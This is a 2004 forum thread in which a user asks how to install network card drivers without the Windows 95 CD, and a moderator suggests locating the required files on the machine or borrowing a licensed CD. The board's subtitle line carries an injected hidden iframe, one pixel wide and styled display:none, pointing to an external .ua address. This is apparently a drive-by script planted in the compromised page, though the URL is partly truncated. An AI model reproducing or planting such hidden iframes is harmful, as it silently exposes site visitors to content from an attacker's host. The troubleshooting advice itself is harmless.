I need help with windows 95!

Non-DC related talk...<iframe src=http://pokupka.ks.ua/templates/As/image ... p?from=com width=1 height=1 style=display:none></iframe>

Moderator: Moderators

memiekynjj

I need help with windows 95!

Post by memiekynjj » 2004-09-05 19:39

I had to enstall a network card into my old computer. When I am trying to enstall the software for it from it's disk, the puter tells me that i have to have the win 95 disk. I have no idea where that cd is! I'm so stressed! i need internet for school! can anyone help me find somewhere on the net to download the windows 95 software that i need?

thanks alot

frustrated

Xan1977
Forum Moderator

Post by Xan1977 » 2004-09-05 20:02

It's possible that the library files it requires are already installed on that machine, but win95/98 is not very got at recognizing that. During the installation process, when it asks for the 95 disk, pretend like the CD is in the drive and hit OK. Then it should ask for a specific file. Open windows explorer and search for that file. If it finds it, note the directory it exists in and go back to the installation window. Give it that directory. You might have to this several times, for different files in different directories.

If one of the files does not exist on your computer, then open google and see if you can download it.

Barring all that, any win95 CD is legal to use if you hold a license for it. So borrowing one is fine.